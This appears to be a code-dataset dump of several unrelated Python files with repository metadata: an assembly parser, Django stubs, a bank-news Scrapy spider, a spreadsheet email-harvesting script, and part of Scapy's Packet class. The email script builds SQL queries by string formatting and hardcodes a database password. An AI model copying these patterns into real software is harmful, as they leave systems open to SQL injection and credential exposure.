blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b318240301cd14d68a20b64b9a2d2306f58edadf | ad78b8a8e22445bbc517749ee594a805eea9729f | /tools/PyAsm.py | 7df05409ed05f3b5f524e0043b6f1bee71840d29 | [] | no_license | fbrosser/DSP48E1-FP | 8d15ce40eb1d6fef976bdc90866b8a406d50e2b1 | 3bee71d52cc6ca4c421a43731d903420ed930a9d | refs/heads/master | 2021-05-26T17:25:02.898937 | 2013-03-29T06:41:50 | 2013-03-29T06:41:50 | 5,396,713 | 19 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,743 | py | ### Python reading and matching from assembler source file
### Fredrik Brosser 2012-11-14
# Import regular expressions library
# (Overkill to use here, but includes powerful features for more advanced use)
import re
# File to be read and variables
fileName = "test.asm"
SPoffset = "No offset found"
# Array of register names as str (remember, python is untyped!)
registers = ['v0', 'v1', 'v2', 'v3', 'v4', 'v5']
usedRegisters = []
unusedRegisters = []
# Read line by line in file, stripping the newline character
lines = [line.strip() for line in open(fileName)]
# Pick stack pointer offset from first line that matches
for l in lines:
# Note: this pattern is overly generic (for whitespace)
m = re.match('\s?' + 'addiu' + '\s?' + 'sp'+ '\s?' + ',' + '\s?' + 'sp' + '\s?' + ',' + '\s?' + '(-{0,1}\d+)', l)
if m:
# Pick out content of first bracket subgroup
SPoffset = m.group(1)
break
# Look for usage of registers as specified in the registers array
for l in lines:
for i in range(len(registers)):
m = re.search(registers[i], l)
if m:
usedRegisters.append(registers[i])
# Sort registers and remove duplicate entries
usedRegisters = sorted(set(usedRegisters))
# Check for unused registers
unusedRegisters = [r for r in registers if r not in usedRegisters]
# Sort registers and remove duplicate entries
unusedRegisters = sorted(set(unusedRegisters))
# Print results
print "\n ***** Raw assembler program ***** \n"
for l in lines:
print l
print "\n ***** Stack pointer offset *****"
print SPoffset
print "\n ***** Used registers *****"
for r in usedRegisters:
print r
print "\n ***** Unsed registers *****"
for r in unusedRegisters:
print r
print ""
| [
"fb.msngr@gmail.com"
] | fb.msngr@gmail.com |
ce733cff00e5fc475a5c89434671f080addcdf37 | c36b0d629ef5ad6242966de7142094c9164ada5b | /trackself/tests.py | dd1eb5f2b8a7cd05dd445b8c49451eeea499cd65 | [] | no_license | fingerecho/trackingsite | 039f340d845759d50effb7f0270b587c2897085d | fad56ba8b31233536117339a70a25617b18fe853 | refs/heads/master | 2020-04-08T01:43:39.023302 | 2018-11-24T06:03:23 | 2018-11-24T06:03:23 | 158,907,263 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | from django.test import TestCase
# Create your tests here.
"""
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Cache-Control: Private
Connection: keep-alive
Content-Length: 47
Content-Security-Policy: script-src gitee.fyping.cn:65533 https://fingerecho.gitee.io
Content-Type: application/javascript
Date: Sat, 24 Nov 2018 03:17:29 GMT
Server: nginx/1.12.2
""" | [
"m13001282105@163.com"
] | m13001282105@163.com |
186e8ba7e922e66bf52aec6dd413f716dd491b2b | 8a44eecda3f57ff1f7a412d1f47c19d59d65cac5 | /realtors/admin.py | 709f0f1502ca2d0c8e57c0fa0b7d4ddeecfa25ef | [] | no_license | KalashMaskey/Python-btre-project | 15b14f2e72e9ec2ef143f9c2057ae7bb42548f1e | 41bf6dd1f1cdd18c5a43dc283c090413dd07a80d | refs/heads/master | 2022-10-20T16:10:19.890918 | 2020-07-03T08:00:45 | 2020-07-03T08:00:45 | 275,541,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from django.contrib import admin
from .models import Realtor
class RealtorAdmin(admin.ModelAdmin):
list_display =('id','name','email','hire_date')
list_display_links = ('id','name')
search_fields = ('name',)
list_per_page = 25
admin.site.register(Realtor,RealtorAdmin)
| [
"kalashm24@gmail.com"
] | kalashm24@gmail.com |
83144e3be32adf441af293dfb34a17220026af02 | c6bda9ed39fb1a121a85d8822ea8c3a8d84de64a | /danskebanklu/spiders/spider.py | b6c5d76df9578414d0d81933ca95eeb95a5939ec | [] | no_license | hristo-grudev/danskebanklu | 9e337b58767c8f40bfffaf54ddc373323dfc71ab | 9aa261464953e74ee258b63ff134983bce4760f7 | refs/heads/main | 2023-03-05T12:16:36.538807 | 2021-02-18T07:32:55 | 2021-02-18T07:32:55 | 339,970,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,021 | py | import scrapy
from scrapy.loader import ItemLoader
from ..items import DanskebankluItem
from itemloaders.processors import TakeFirst
class DanskebankluSpider(scrapy.Spider):
name = 'danskebanklu'
start_urls = ['https://danskebank.lu/private-banking/news']
def parse(self, response):
post_links = response.xpath('//li[@class="overview-item"]/a/@href').getall()
yield from response.follow_all(post_links, self.parse_post)
def parse_post(self, response):
title = response.xpath('//h1/text()').get()
description = response.xpath('//div[@class="row article-body"]//text()[normalize-space()]').getall()
description = [p.strip() for p in description]
description = ' '.join(description).strip()
date = response.xpath('//div[@class="meta"]/span/text()').get()
item = ItemLoader(item=DanskebankluItem(), response=response)
item.default_output_processor = TakeFirst()
item.add_value('title', title)
item.add_value('description', description)
item.add_value('date', date)
return item.load_item() | [
"hr.grudev@gmail.com"
] | hr.grudev@gmail.com |
b676e3454df9fe014b0719b5ddf0092f3da82393 | 1a8e44a757c2ca1a1cce6a7dfd73b7152e9e5970 | /basis_email.py | 49562fef1edbae3876e1240bc4299bcc975c6240 | [] | no_license | sarwarsikder/import_xlsx_pandas | c75095964718430168755c1188d61eec763a267e | e41fc3b98f2f90f750602ced61677f982fe60be5 | refs/heads/master | 2022-10-14T06:43:42.672750 | 2020-03-03T07:27:40 | 2020-03-03T07:27:40 | 244,541,070 | 1 | 0 | null | 2022-06-22T01:19:55 | 2020-03-03T04:25:49 | Python | UTF-8 | Python | false | false | 3,779 | py | import mysql.connector
import pandas as pds
import datetime as date_time
import re
db_con = mysql.connector.connect(
host="localhost",
user="root",
password="password",
database="pick_email"
)
cursor_connection = db_con.cursor()
sql_transaction = []
# Define a function for
# for validating an Email
def email_checker(email):
# pass the regualar expression
# and the string in search() method
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
if (re.search(regex, email)):
return True
else:
return False
def transaction_bldr(sql):
global sql_transaction
sql_transaction.append(sql)
# print(sql)
if len(sql_transaction) > 100:
db_con.execute('BEGIN TRANSACTION')
for s in sql_transaction:
try:
db_con.execute(s)
except:
pass
cursor_connection.commit()
sql_transaction = []
def find_existing_phone_number(email):
try:
sql = "SELECT email FROM email_collection WHERE email LIKE '{}' LIMIT 1".format(
'%' + email + '%')
# print(sql)
cursor_connection.execute(sql)
result = cursor_connection.fetchone()
if result != None:
return result[0]
else:
return False
except Exception as e:
print(str(e))
return False
def insert_email_number(email, date, create_by):
try:
if email_checker(email):
sql = """INSERT INTO email_collection ( email , created_by) VALUES ("{}","{}");""".format(
email, create_by)
# print(sql)
cursor_connection.execute(sql)
db_con.commit()
except Exception as e:
print('s0 insertion', str(e))
if __name__ == '__main__':
# pd__data_obj = pds.read_excel('ovi.xlsx')
pd__data_obj = pds.read_excel('Assciations.xlsx',
sheet_name='BAIRA',
converters={'Email': str})
pd_data_value = pds.DataFrame(pd__data_obj, columns=['Email']).dropna()
for target_item in pd_data_value.index:
email = str(pd_data_value['Email'][target_item]).strip()
created_by = "Assciations--BAIRA"
if "," in email:
seg_phones = email.split(",")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
elif ";" in email:
seg_phones = email.split(";")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
elif ";" in email:
seg_phones = email.split(" ")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
else:
print(email)
insert_email_number(email, str('25-02-2020'), created_by)
# if find_existing_phone_number(email):
# print(email)
# insert_email_number(email, str('25-02-2020'), created_by)
| [
"sarwar@workspaceit.com"
] | sarwar@workspaceit.com |
ad6ec079550e0235bcea5e8350130e7a74d839f5 | 81ef1b1d100041d28a8af9c1f153eed2e3c9c3e5 | /joecceasy/ReferencesAndExamplesOfCode.py | 836f45668bb576058279d743d58771d51387b7b5 | [
"MIT"
] | permissive | joetainment/joecceasy | 8f605d20f543d162adc56cb5cb23ce8f45f56553 | be300a6c30bcc1e09e7b2c3561fd2ab13836396b | refs/heads/master | 2022-02-24T03:37:06.254731 | 2022-02-10T15:00:48 | 2022-02-10T15:00:48 | 251,486,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py |
class ExampleClass01Meta(type):
## __setattr__ and __getattr__ can potentially cause issues
## such as recursions (they introduce serious complexity)
'''
def __setattr__(cls, key, val ):
if key=='P':
print( val )
#else:
# setattr( cls, key, val) ## recursion issues
''' | [
"joecceasy@joetainment.com"
] | joecceasy@joetainment.com |
bf362dc62e8492e1c8bc63a7995980c16df7f4fd | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /HpqLxNqqRvMQoz8ME_16.py | d81164152044bf439087a06dc09c07b9ce593cce | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | """
Create a function that takes a string and returns a string in which each
character is repeated once.
### Examples
double_char("String") ➞ "SSttrriinngg"
double_char("Hello World!") ➞ "HHeelllloo WWoorrlldd!!"
double_char("1234!_ ") ➞ "11223344!!__ "
### Notes
All test cases contain valid strings. Don't worry about spaces, special
characters or numbers. They're all considered valid characters.
"""
double_char=lambda s:"".join(c*2 for c in s)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
9004a92c13e158c5c29a871a47308f4db2a9c0c9 | 372dbfdc84975cb1ab675f41e1c197e4e90ff878 | /backend/device_registry/migrations/0028_auto_20190511_0723.py | 04ebac94b48ae075a9d8dd430b9b13a64b6b7061 | [
"MIT"
] | permissive | a-martynovich/api | 3fcd45ff9bfa07cb8a3c47b4c55365c5133cd071 | 702254c48677cf5a6f2fe298bced854299868eef | refs/heads/master | 2023-02-16T06:16:53.623613 | 2020-11-18T10:49:55 | 2020-11-18T10:49:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | # Generated by Django 2.1.7 on 2019-05-11 07:23
from django.db import migrations
from django.contrib.postgres.fields import JSONField
class Migration(migrations.Migration):
dependencies = [
('device_registry', '0027_auto_20190509_0516'),
]
operations = [
migrations.AlterField(
model_name='portscan',
name='block_ports',
field=JSONField(default=list),
),
]
| [
"pythonpro@gmail.com"
] | pythonpro@gmail.com |
b5ed4e6260b24335bf7015ee07fd28da69d6e0a9 | 47e15487e41120a4ef3adffa738cbc165c2172fc | /venv/pythonInterpreter/lib/python3.9/site-packages/scapy/packet.py | d656ac55aa0120973a08973d22c644f94bda6bca | [] | no_license | TjTheGeek/Pene-Test | 01bf532f61a4dd6ec2745ceedf1f2c4253a168b1 | d1d8c2499a5b1102fbd049ac1dc499a0156dafc0 | refs/heads/master | 2023-06-30T22:50:40.628209 | 2021-08-03T12:52:59 | 2021-08-03T12:52:59 | 367,958,884 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93,706 | py | # This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Packet class
Provides:
- the default Packet classes
- binding mechanisms
- fuzz() method
- exploration methods: explore() / ls()
"""
from __future__ import absolute_import
from __future__ import print_function
from collections import defaultdict
import re
import time
import itertools
import copy
import types
import warnings
from scapy.fields import (
AnyField,
BitField,
ConditionalField,
Emph,
EnumField,
Field,
FlagsField,
MultiEnumField,
MultipleTypeField,
PacketListField,
RawVal,
StrField,
)
from scapy.config import conf, _version_checker
from scapy.compat import raw, orb, bytes_encode
from scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \
_CanvasDumpExtended
from scapy.interfaces import _GlobInterfaceType
from scapy.volatile import RandField, VolatileValue
from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \
pretty_list, EDecimal
from scapy.error import Scapy_Exception, log_runtime, warning
from scapy.extlib import PYX
import scapy.modules.six as six
# Typing imports
from scapy.compat import (
Any,
Callable,
Dict,
Iterator,
List,
NoReturn,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
Sequence,
cast,
)
try:
import pyx
except ImportError:
pass
_T = TypeVar("_T", Dict[str, Any], Optional[Dict[str, Any]])
# six.with_metaclass typing is glitchy
class Packet(six.with_metaclass(Packet_metaclass, # type: ignore
BasePacket, _CanvasDumpExtended)):
__slots__ = [
"time", "sent_time", "name",
"default_fields", "fields", "fieldtype",
"overload_fields", "overloaded_fields",
"packetfields",
"original", "explicit", "raw_packet_cache",
"raw_packet_cache_fields", "_pkt", "post_transforms",
# then payload and underlayer
"payload", "underlayer",
"name",
# used for sr()
"_answered",
# used when sniffing
"direction", "sniffed_on",
# handle snaplen Vs real length
"wirelen",
]
name = None
fields_desc = [] # type: Sequence[AnyField]
deprecated_fields = {} # type: Dict[str, Tuple[str, str]]
overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]]
payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]]
show_indent = 1
show_summary = True
match_subclass = False
class_dont_cache = {} # type: Dict[Type[Packet], bool]
class_packetfields = {} # type: Dict[Type[Packet], Any]
class_default_fields = {} # type: Dict[Type[Packet], Dict[str, Any]]
class_default_fields_ref = {} # type: Dict[Type[Packet], List[str]]
class_fieldtype = {} # type: Dict[Type[Packet], Dict[str, AnyField]] # noqa: E501
@classmethod
def from_hexcap(cls):
# type: (Type[Packet]) -> Packet
return cls(import_hexcap())
@classmethod
def upper_bonds(self):
# type: () -> None
for fval, upper in self.payload_guess:
print("%-20s %s" % (upper.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501
@classmethod
def lower_bonds(self):
# type: () -> None
for lower, fval in six.iteritems(self._overload_fields):
print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501
def __init__(self,
_pkt=b"", # type: bytes
post_transform=None, # type: Any
_internal=0, # type: int
_underlayer=None, # type: Optional[Packet]
**fields # type: Any
):
# type: (...) -> None
self.time = time.time() # type: Union[EDecimal, float]
self.sent_time = None # type: Union[EDecimal, float, None]
self.name = (self.__class__.__name__
if self._name is None else
self._name)
self.default_fields = {} # type: Dict[str, Any]
self.overload_fields = self._overload_fields
self.overloaded_fields = {} # type: Dict[str, Any]
self.fields = {} # type: Dict[str, Any]
self.fieldtype = {} # type: Dict[str, AnyField]
self.packetfields = [] # type: List[AnyField]
self.payload = NoPayload()
self.init_fields()
self.underlayer = _underlayer
self.original = _pkt
self.explicit = 0
self.raw_packet_cache = None # type: Optional[bytes]
self.raw_packet_cache_fields = None # type: Optional[Dict[str, Any]] # noqa: E501
self.wirelen = None # type: Optional[int]
self.direction = None # type: Optional[int]
self.sniffed_on = None # type: Optional[_GlobInterfaceType]
if _pkt:
self.dissect(_pkt)
if not _internal:
self.dissection_done(self)
# We use this strange initialization so that the fields
# are initialized in their declaration order.
# It is required to always support MultipleTypeField
for field in self.fields_desc:
fname = field.name
try:
value = fields.pop(fname)
except KeyError:
continue
self.fields[fname] = self.get_field(fname).any2i(self, value)
# The remaining fields are unknown
for fname in fields:
if fname in self.deprecated_fields:
# Resolve deprecated fields
value = fields[fname]
fname = self._resolve_alias(fname)
self.fields[fname] = self.get_field(fname).any2i(self, value)
continue
raise AttributeError(fname)
if isinstance(post_transform, list):
self.post_transforms = post_transform
elif post_transform is None:
self.post_transforms = []
else:
self.post_transforms = [post_transform]
_PickleType = Tuple[
Union[EDecimal, float],
Optional[Union[EDecimal, float, None]],
Optional[int],
Optional[_GlobInterfaceType],
Optional[int]
]
def __reduce__(self):
# type: () -> Tuple[Type[Packet], Tuple[bytes], Packet._PickleType]
"""Used by pickling methods"""
return (self.__class__, (self.build(),), (
self.time,
self.sent_time,
self.direction,
self.sniffed_on,
self.wirelen,
))
def __setstate__(self, state):
# type: (Packet._PickleType) -> Packet
"""Rebuild state using pickable methods"""
self.time = state[0]
self.sent_time = state[1]
self.direction = state[2]
self.sniffed_on = state[3]
self.wirelen = state[4]
return self
def __deepcopy__(self,
memo, # type: Any
):
# type: (...) -> Packet
"""Used by copy.deepcopy"""
return self.copy()
def init_fields(self):
# type: () -> None
"""
Initialize each fields of the fields_desc dict
"""
if self.class_dont_cache.get(self.__class__, False):
self.do_init_fields(self.fields_desc)
else:
self.do_init_cached_fields()
def do_init_fields(self,
flist, # type: Sequence[AnyField]
):
# type: (...) -> None
"""
Initialize each fields of the fields_desc dict
"""
default_fields = {}
for f in flist:
default_fields[f.name] = copy.deepcopy(f.default)
self.fieldtype[f.name] = f
if f.holds_packets:
self.packetfields.append(f)
# We set default_fields last to avoid race issues
self.default_fields = default_fields
def do_init_cached_fields(self):
# type: () -> None
"""
Initialize each fields of the fields_desc dict, or use the cached
fields information
"""
cls_name = self.__class__
# Build the fields information
if Packet.class_default_fields.get(cls_name, None) is None:
self.prepare_cached_fields(self.fields_desc)
# Use fields information from cache
default_fields = Packet.class_default_fields.get(cls_name, None)
if default_fields:
self.default_fields = default_fields
self.fieldtype = Packet.class_fieldtype[cls_name]
self.packetfields = Packet.class_packetfields[cls_name]
# Deepcopy default references
for fname in Packet.class_default_fields_ref[cls_name]:
value = self.default_fields[fname]
try:
self.fields[fname] = value.copy()
except AttributeError:
# Python 2.7 - list only
self.fields[fname] = value[:]
def prepare_cached_fields(self, flist):
# type: (Sequence[AnyField]) -> None
"""
Prepare the cached fields of the fields_desc dict
"""
cls_name = self.__class__
# Fields cache initialization
if not flist:
return
class_default_fields = dict()
class_default_fields_ref = list()
class_fieldtype = dict()
class_packetfields = list()
# Fields initialization
for f in flist:
if isinstance(f, MultipleTypeField):
# Abort
self.class_dont_cache[cls_name] = True
self.do_init_fields(self.fields_desc)
return
tmp_copy = copy.deepcopy(f.default)
class_default_fields[f.name] = tmp_copy
class_fieldtype[f.name] = f
if f.holds_packets:
class_packetfields.append(f)
# Remember references
if isinstance(f.default, (list, dict, set, RandField, Packet)):
class_default_fields_ref.append(f.name)
# Apply
Packet.class_default_fields_ref[cls_name] = class_default_fields_ref
Packet.class_fieldtype[cls_name] = class_fieldtype
Packet.class_packetfields[cls_name] = class_packetfields
# Last to avoid racing issues
Packet.class_default_fields[cls_name] = class_default_fields
def dissection_done(self, pkt):
# type: (Packet) -> None
"""DEV: will be called after a dissection is completed"""
self.post_dissection(pkt)
self.payload.dissection_done(pkt)
def post_dissection(self, pkt):
# type: (Packet) -> None
"""DEV: is called after the dissection of the whole packet"""
pass
def get_field(self, fld):
# type: (str) -> AnyField
"""DEV: returns the field instance from the name of the field"""
return self.fieldtype[fld]
def add_payload(self, payload):
# type: (Union[Packet, bytes]) -> None
if payload is None:
return
elif not isinstance(self.payload, NoPayload):
self.payload.add_payload(payload)
else:
if isinstance(payload, Packet):
self.payload = payload
payload.add_underlayer(self)
for t in self.aliastypes:
if t in payload.overload_fields:
self.overloaded_fields = payload.overload_fields[t]
break
elif isinstance(payload, (bytes, str, bytearray, memoryview)):
self.payload = conf.raw_layer(load=bytes_encode(payload))
else:
raise TypeError("payload must be 'Packet', 'bytes', 'str', 'bytearray', or 'memoryview', not [%s]" % repr(payload)) # noqa: E501
def remove_payload(self):
# type: () -> None
self.payload.remove_underlayer(self)
self.payload = NoPayload()
self.overloaded_fields = {}
def add_underlayer(self, underlayer):
# type: (Packet) -> None
self.underlayer = underlayer
def remove_underlayer(self, other):
# type: (Packet) -> None
self.underlayer = None
def copy(self):
# type: () -> Packet
"""Returns a deep copy of the instance."""
clone = self.__class__()
clone.fields = self.copy_fields_dict(self.fields)
clone.default_fields = self.copy_fields_dict(self.default_fields)
clone.overloaded_fields = self.overloaded_fields.copy()
clone.underlayer = self.underlayer
clone.explicit = self.explicit
clone.raw_packet_cache = self.raw_packet_cache
clone.raw_packet_cache_fields = self.copy_fields_dict(
self.raw_packet_cache_fields
)
clone.wirelen = self.wirelen
clone.post_transforms = self.post_transforms[:]
clone.payload = self.payload.copy()
clone.payload.add_underlayer(clone)
clone.time = self.time
return clone
def _resolve_alias(self, attr):
# type: (str) -> str
new_attr, version = self.deprecated_fields[attr]
warnings.warn(
"%s has been deprecated in favor of %s since %s !" % (
attr, new_attr, version
), DeprecationWarning
)
return new_attr
def getfieldval(self, attr):
# type: (str) -> Any
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.fields:
return self.fields[attr]
if attr in self.overloaded_fields:
return self.overloaded_fields[attr]
if attr in self.default_fields:
return self.default_fields[attr]
return self.payload.getfieldval(attr)
def getfield_and_val(self, attr):
# type: (str) -> Tuple[AnyField, Any]
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.fields:
return self.get_field(attr), self.fields[attr]
if attr in self.overloaded_fields:
return self.get_field(attr), self.overloaded_fields[attr]
if attr in self.default_fields:
return self.get_field(attr), self.default_fields[attr]
raise ValueError
def __getattr__(self, attr):
# type: (str) -> Any
try:
fld, v = self.getfield_and_val(attr)
except ValueError:
return self.payload.__getattr__(attr)
if fld is not None:
return fld.i2h(self, v)
return v
def setfieldval(self, attr, val):
# type: (str, Any) -> None
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.default_fields:
fld = self.get_field(attr)
if fld is None:
any2i = lambda x, y: y # type: Callable[..., Any]
else:
any2i = fld.any2i
self.fields[attr] = any2i(self, val)
self.explicit = 0
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
elif attr == "payload":
self.remove_payload()
self.add_payload(val)
else:
self.payload.setfieldval(attr, val)
def __setattr__(self, attr, val):
# type: (str, Any) -> None
if attr in self.__all_slots__:
if attr == "sent_time":
self.update_sent_time(val)
return object.__setattr__(self, attr, val)
try:
return self.setfieldval(attr, val)
except AttributeError:
pass
return object.__setattr__(self, attr, val)
def delfieldval(self, attr):
# type: (str) -> None
if attr in self.fields:
del(self.fields[attr])
self.explicit = 0 # in case a default value must be explicit
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
elif attr in self.default_fields:
pass
elif attr == "payload":
self.remove_payload()
else:
self.payload.delfieldval(attr)
def __delattr__(self, attr):
# type: (str) -> None
if attr == "payload":
return self.remove_payload()
if attr in self.__all_slots__:
return object.__delattr__(self, attr)
try:
return self.delfieldval(attr)
except AttributeError:
pass
return object.__delattr__(self, attr)
def _superdir(self):
# type: () -> Set[str]
"""
Return a list of slots and methods, including those from subclasses.
"""
attrs = set()
cls = self.__class__
if hasattr(cls, '__all_slots__'):
attrs.update(cls.__all_slots__)
for bcls in cls.__mro__:
if hasattr(bcls, '__dict__'):
attrs.update(bcls.__dict__)
return attrs
def __dir__(self):
# type: () -> List[str]
"""
Add fields to tab completion list.
"""
return sorted(itertools.chain(self._superdir(), self.default_fields))
def __repr__(self):
# type: () -> str
s = ""
ct = conf.color_theme
for f in self.fields_desc:
if isinstance(f, ConditionalField) and not f._evalcond(self):
continue
if f.name in self.fields:
fval = self.fields[f.name]
if isinstance(fval, (list, dict, set)) and len(fval) == 0:
continue
val = f.i2repr(self, fval)
elif f.name in self.overloaded_fields:
fover = self.overloaded_fields[f.name]
if isinstance(fover, (list, dict, set)) and len(fover) == 0:
continue
val = f.i2repr(self, fover)
else:
continue
if isinstance(f, Emph) or f in conf.emph:
ncol = ct.emph_field_name
vcol = ct.emph_field_value
else:
ncol = ct.field_name
vcol = ct.field_value
s += " %s%s%s" % (ncol(f.name),
ct.punct("="),
vcol(val))
return "%s%s %s %s%s%s" % (ct.punct("<"),
ct.layer_name(self.__class__.__name__),
s,
ct.punct("|"),
repr(self.payload),
ct.punct(">"))
if six.PY2:
def __str__(self):
# type: () -> str
return self.build()
else:
def __str__(self):
# type: () -> str
return str(self.build())
def __bytes__(self):
# type: () -> bytes
return self.build()
def __div__(self, other):
# type: (Any) -> Packet
if isinstance(other, Packet):
cloneA = self.copy()
cloneB = other.copy()
cloneA.add_payload(cloneB)
return cloneA
elif isinstance(other, (bytes, str, bytearray, memoryview)):
return self / conf.raw_layer(load=bytes_encode(other))
else:
return other.__rdiv__(self) # type: ignore
__truediv__ = __div__
def __rdiv__(self, other):
# type: (Any) -> Packet
if isinstance(other, (bytes, str, bytearray, memoryview)):
return conf.raw_layer(load=bytes_encode(other)) / self
else:
raise TypeError
__rtruediv__ = __rdiv__
def __mul__(self, other):
# type: (Any) -> List[Packet]
if isinstance(other, int):
return [self] * other
else:
raise TypeError
def __rmul__(self, other):
# type: (Any) -> List[Packet]
return self.__mul__(other)
def __nonzero__(self):
# type: () -> bool
return True
__bool__ = __nonzero__
def __len__(self):
# type: () -> int
return len(self.__bytes__())
def copy_field_value(self, fieldname, value):
# type: (str, Any) -> Any
return self.get_field(fieldname).do_copy(value)
def copy_fields_dict(self, fields):
# type: (_T) -> _T
if fields is None:
return None
return {fname: self.copy_field_value(fname, fval)
for fname, fval in six.iteritems(fields)}
def clear_cache(self):
# type: () -> None
"""Clear the raw packet cache for the field and all its subfields"""
self.raw_packet_cache = None
for fld, fval in six.iteritems(self.fields):
fld = self.get_field(fld)
if fld.holds_packets:
if isinstance(fval, Packet):
fval.clear_cache()
elif isinstance(fval, list):
for fsubval in fval:
fsubval.clear_cache()
self.payload.clear_cache()
def self_build(self):
# type: () -> bytes
"""
Create the default layer regarding fields_desc dict
:param field_pos_list:
"""
if self.raw_packet_cache is not None:
for fname, fval in six.iteritems(self.raw_packet_cache_fields):
if self.getfieldval(fname) != fval:
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
break
if self.raw_packet_cache is not None:
return self.raw_packet_cache
p = b""
for f in self.fields_desc:
val = self.getfieldval(f.name)
if isinstance(val, RawVal):
p += bytes(val)
else:
p = f.addfield(self, p, val)
return p
def do_build_payload(self):
# type: () -> bytes
"""
Create the default version of the payload layer
:return: a string of payload layer
"""
return self.payload.do_build()
def do_build(self):
# type: () -> bytes
"""
Create the default version of the layer
:return: a string of the packet with the payload
"""
if not self.explicit:
self = next(iter(self))
pkt = self.self_build()
for t in self.post_transforms:
pkt = t(pkt)
pay = self.do_build_payload()
if self.raw_packet_cache is None:
return self.post_build(pkt, pay)
else:
return pkt + pay
def build_padding(self):
# type: () -> bytes
return self.payload.build_padding()
def build(self):
# type: () -> bytes
"""
Create the current layer
:return: string of the packet with the payload
"""
p = self.do_build()
p += self.build_padding()
p = self.build_done(p)
return p
def post_build(self, pkt, pay):
# type: (bytes, bytes) -> bytes
"""
DEV: called right after the current layer is build.
:param str pkt: the current packet (build by self_buil function)
:param str pay: the packet payload (build by do_build_payload function)
:return: a string of the packet with the payload
"""
return pkt + pay
def build_done(self, p):
# type: (bytes) -> bytes
return self.payload.build_done(p)
def do_build_ps(self):
# type: () -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Field[Any, Any], str, bytes]]]]] # noqa: E501
p = b""
pl = []
q = b""
for f in self.fields_desc:
if isinstance(f, ConditionalField) and not f._evalcond(self):
continue
p = f.addfield(self, p, self.getfieldval(f.name))
if isinstance(p, bytes):
r = p[len(q):]
q = p
else:
r = b""
pl.append((f, f.i2repr(self, self.getfieldval(f.name)), r))
pkt, lst = self.payload.build_ps(internal=1)
p += pkt
lst.append((self, pl))
return p, lst
def build_ps(self, internal=0):
# type: (int) -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Any, Any, bytes]]]]] # noqa: E501
p, lst = self.do_build_ps()
# if not internal:
# pkt = self
# while pkt.haslayer(conf.padding_layer):
# pkt = pkt.getlayer(conf.padding_layer)
# lst.append( (pkt, [ ("loakjkjd", pkt.load, pkt.load) ] ) )
# p += pkt.load
# pkt = pkt.payload
return p, lst
def canvas_dump(self, layer_shift=0, rebuild=1):
# type: (int, int) -> pyx.canvas.canvas
if PYX == 0:
raise ImportError("PyX and its dependencies must be installed")
canvas = pyx.canvas.canvas()
if rebuild:
_, t = self.__class__(raw(self)).build_ps()
else:
_, t = self.build_ps()
YTXTI = len(t)
for _, l in t:
YTXTI += len(l)
YTXT = float(YTXTI)
